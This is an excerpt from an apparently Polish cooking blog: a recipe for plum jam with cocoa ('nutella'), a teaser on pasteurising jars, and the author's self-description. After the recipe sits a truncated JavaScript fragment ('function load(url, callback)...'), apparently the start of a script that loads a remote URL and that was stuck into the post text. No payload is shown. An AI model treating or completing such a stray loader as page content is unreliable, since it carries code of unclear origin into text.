Składniki – porcja na 1 litr dżemu: 3 kg śliwek węgierek, 0,5 kg cukru, 100 gram ciemnego kakao. Krok 1 Wydrylowane śliwki przekładamy do garnka i zasypujemy cukrem. Całość gotujemy około 3 godzin mieszając od czasu do czasu, żeby śliwki się nie przypaliły. Krok 2 Dodajemy do śliwek kakao i gotujemy jeszcze 20 minut cały czas mieszając. Krok 3 Gorącą nutellę przekładamy do wyparzonych słoików i pasteryzujemy 20 minut. Smacznego function load(url, callback) { var xhr; if(typeof XM... czytaj dalej...
Znany od bardzo dawna sposób pasteryzacji niektórych produktów w szczelnie zamkniętym szklanym słoiki jest najlepszym sposobem na przedłużenie ich czasu do spożycia.
Czytaj dalej...Kocham życie i wszystko to, co mnie otacza – ludzi, miejsca, muzykę,podróże. Wieczna optymistka szukająca wyzwań, Już zastanawiam się „Ciekawe, co fajnego się dziś wydarzy?” :)